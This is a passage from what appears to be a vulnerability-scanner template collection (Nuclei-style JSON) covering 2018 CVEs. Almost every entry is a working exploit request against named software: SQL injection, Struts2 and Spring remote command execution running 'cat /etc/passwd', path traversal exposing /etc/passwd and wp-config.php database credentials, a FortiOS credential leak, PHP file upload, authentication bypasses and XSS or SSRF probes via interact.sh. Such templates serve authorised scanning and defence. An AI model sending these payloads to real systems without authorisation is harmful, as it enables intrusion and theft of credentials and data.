Login","data-grav-"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6605","info":{"name":"Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"id=-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5({{num}}),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+","matchers-condition":"and","matchers":[{"type":"word","words":["{{md5(num)}}","dataexists"],"part":"body"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10736","info":{"name":"NagiosXI <= 5.4.12 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5({{num}}))%23"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-10737","info":{"name":"NagiosXI <= 5.4.12 logbook.php SQL injection","severity":"high"},"requests":[{"raw":["POST /nagiosql/admin/logbook.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntxtSearch=' and (select 1 from(select count(*),concat((select (select (select md5({{num}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#\n"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-6910","info":{"name":"DedeCMS 5.7 - Path Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/include/downmix.inc.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["downmix.inc.php","Call to undefined function helper()"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1273","info":{"name":"Spring Data Commons - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /account HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nContent-Type: application/x-www-form-urlencoded\n\nname[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode(command)}}')]={{to_lower(rand_text_alpha(5))}}\n"],"payloads":{"command":["cat /etc/passwd","type C:\\/Windows\\/win.ini"]},"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"}]}]},{"id":"CVE-2018-16761","info":{"name":"Eventum <3.4.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/select_project.php?url=http://interact.sh","{{BaseURL}}/clock_status.php?current_page=http://interact.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-12296","info":{"name":"Seagate NAS OS 4.3.15.1 - Server Information Disclosure","severity":"high"},"requests":[{"raw":["POST /api/external/7.0/system.System.get_infos HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"body","words":["\"version\":","\"serial_number\":"],"condition":"and"}],"extractors":[{"type":"regex","group":1,"regex":["\"version\": \"([0-9.]+)\""],"part":"body"}]}]},{"id":"CVE-2018-11759","info":{"name":"Apache Tomcat JK Connect <=1.2.44 - Manager Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jkstatus","{{BaseURL}}/jkstatus;"],"matchers-condition":"and","matchers":[{"type":"word","words":["JK Status Manager"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14912","info":{"name":"cgit < 1.2.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10823","info":{"name":"D-Link Routers - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8770","info":{"name":"Cobub Razor 0.8.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tests/generate.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Fatal error: Class 'PHPUnit_Framework_TestCase' not found in ","/application/third_party/CIUnit/libraries/CIUnitTestCase.php on line"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15138","info":{"name":"LG-Ericsson iPECS NMS 30M - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data","{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7700","info":{"name":"DedeCMS 5.7SP2 - Cross-Site Request Forgery/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["4cc32a3a81d2bb37271934a48ce4468a"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12998","info":{"name":"Zoho manageengine - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18264","info":{"name":"Kubernetes Dashboard <1.10.1 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs","{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"apiVersion\") && contains(body, \"objectRef\")"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18069","info":{"name":"WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin.php"],"body":"icl_post_action=save_theme_localization&locale_file_name_en=EN\"><script>alert(0);</script>\n","host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(tolower(header), \"text/html\")","contains(set_cookie, \"_icl_current_admin_language\")","contains(body, \"\\\"><script>alert(0);</script>\")"],"condition":"and"}]}]},{"id":"CVE-2018-1000600","info":{"name":"Jenkins GitHub Plugin <=1.29.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-11231","info":{"name":"Opencart Divido - Sql Injection","severity":"high"},"requests":[{"raw":["POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1\nHost: {{Hostname}}\n\n{\"metadata\":{\"order_id\":\"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)\"},\"status\":2}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000861","info":{"name":"Jenkins - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["package#vulntest"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20470","info":{"name":"Tyto Sahi pro 7.x/8.x - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000129","info":{"name":"Jolokia 1.3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html","{{BaseURL}}/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg onload=alert(document.domain)>","java.lang.IllegalArgumentException","No type with name"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20010","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/ssl-provider-account.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes=\n","GET /assets/ssl-accounts.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-1000130","info":{"name":"Jolokia Agent - JNDI Code Injection","severity":"high"},"requests":[{"raw":["POST /jolokia/read/getDiagnosticOptions HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.\nContent-Type: application/x-www-form-urlencoded\n\n{\n   \"type\":\"read\",\n   \"mbean\":\"java.lang:type=Memory\",\n   \"target\":{\n      \"url\":\"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\"\n   }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7314","info":{"name":"Joomla! Component PrayerCenter 3.0.2 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1' AND EXTRACTVALUE(22,CONCAT(0x7e,md5({{num}})))-- X"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-20009","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/ssl-provider.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes=\n","GET /assets/ssl-providers.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-1000671","info":{"name":"Sympa version =>6.2.16 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email="],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-6184","info":{"name":"Zeit Next.js <4.2.3 -  Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11227","info":{"name":"Monstra CMS <=3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?id=pages HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin=\"><svg/onload=alert(document.domain)>&password=xxxxxx&login_submit=Log+In\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(document.domain)>","Monstra"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10735","info":{"name":"NagiosXI <= 5.4.12 `commandline.php` SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5({{num}}))%23"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-10738","info":{"name":"NagiosXI <= 5.4.12 menuaccess.php - SQL injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/nagiosql/admin/menuaccess.php"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"selSubMenu=1&subSave=1&chbKey1=-1%' and (select 1 from(select count(*),concat((select (select (select md5({{num}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-20608","info":{"name":"Imcat 4.4 - Phpinfo Configuration","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/imcat/root/tools/adbug/binfo.php?phpinfo1"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2018-14728","info":{"name":"Responsive filemanager 9.13.1 Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/filemanager/upload.php"],"body":"fldr=&url=file:///etc/passwd","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-1000533","info":{"name":"GitList < 0.6.0 Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /{{path}}/tree/a/search HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nquery=--open-files-in-pager=cat%20/etc/passwd\n"],"matchers":[{"type":"word","part":"body","words":["root:/root:/bin/bash"]}],"extractors":[{"type":"regex","name":"path","group":1,"regex":["<span class=\"name\">(.*?)</span>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-17422","info":{"name":"DotCMS < 5.0.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://oast.me","{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=oast.me"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["self.location = 'http://oast.me'","location.href = 'http\\x3a\\x2f\\x2fwww\\x2eoast\\x2eme'"]}]}]},{"id":"CVE-2018-20463","info":{"name":"WordPress JSmol2WP <=1.07 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'DB_USER',","'DB_PASSWORD'"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8715","info":{"name":"AppWeb - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Digest username=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a class=\"logo\" href=\"https://embedthis.com/\">&nbsp;</a>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16716","info":{"name":"NCBI ToolBox - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12300","info":{"name":"Seagate NAS OS 4.3.15.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-13379","info":{"name":"Fortinet FortiOS - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"],"matchers":[{"type":"regex","part":"body","regex":["^var fgt_lang ="]}]}]},{"id":"CVE-2018-17431","info":{"name":"Comodo Unified Threat Management Web Console - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n","GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Configuration has been altered"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19751","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /admin/ssl-fields/add.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_field_name=new&new_field_type_id=1&new_description=test&new_notes=test\n","GET /admin/ssl-fields/ HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12031","info":{"name":"Eaton Intelligent Power Manager 1.6 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd","{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8823","info":{"name":"PrestaShop Responsive Mega Menu Module - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/bamegamenu/ajax_phpcode.php?code=print(md5({{num}}))"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14064","info":{"name":"VelotiSmart Wifi - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18608","info":{"name":"DedeCMS 5.7 SP2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/feedback.php/rp4hu%27><script>alert%28document.domain%29<%2fscript>?aid=3"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>","DedeCMS Error Warning!"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12675","info":{"name":"SV3C HD Camera L Series - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"word","part":"body","words":["<META http-equiv=\"Refresh\" content=\"0;URL=http://interact.sh\">"]}]}]},{"id":"CVE-2018-16159","info":{"name":"WordPress Gift Voucher <4.1.8 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=wpgv_doajax_front_template&template_id=1 and sleep(6)#\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"images\") && contains(body, \"title\")"],"condition":"and"}]}]},{"id":"CVE-2018-10230","info":{"name":"Zend Server <9.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","is not allowed to open debug sessions"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20011","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/category.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes=\n","GET /assets/categories.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-16341","info":{"name":"Nuxeo <10.3 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml"],"matchers":[{"type":"word","part":"body","words":["31333333337"]}]}]},{"id":"CVE-2018-12054","info":{"name":"Schools Alert Management Script - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/img.php?f=/./etc/./passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14013","info":{"name":"Synacor Zimbra Collaboration Suite Collaboration <8.8.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19137","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>&really_del"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11776","info":{"name":"Apache Struts2 S2-057 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11784","info":{"name":"Apache Tomcat - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//interact.sh"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","negative":true,"status":[404]}]}]},{"id":"CVE-2018-20526","info":{"name":"Roxy Fileman 1.4.5 - Unrestricted File Upload","severity":"critical"},"requests":[{"raw":["POST /php/upload.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary20kgW2hEKYaeF5iP\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"action\"\n\nupload\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"method\"\n\najax\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"d\"\n\n/Uploads\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"files[]\"; filename=\"{{randstr}}.php7\"\nContent-Type: application/octet-stream\n\n<?php\necho md5('CVE-2018-20526');\n?>\n\n------WebKitFormBoundary20kgW2hEKYaeF5iP--\n","GET /Uploads/{{randstr}}.php7 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["f76d6a5f7491700cc3a678bdba2902d3"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000226","info":{"name":"Cobbler - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>_CobblerXMLRPCInterface__make_token</methodName>\n  <params>\n    <param>\n      <value>\n        <string>cobbler</string>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body), '<name>faultCode</name>')"]},{"type":"word","part":"header","words":["Content-Type: text/xml"]},{"type":"word","part":"body","words":["<methodResponse>"]},{"type":"regex","part":"body","regex":["(.*[a-zA-Z0-9].+==)</string></value>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14916","info":{"name":"Loytec LGATE-902 <6.4.2 - Local File 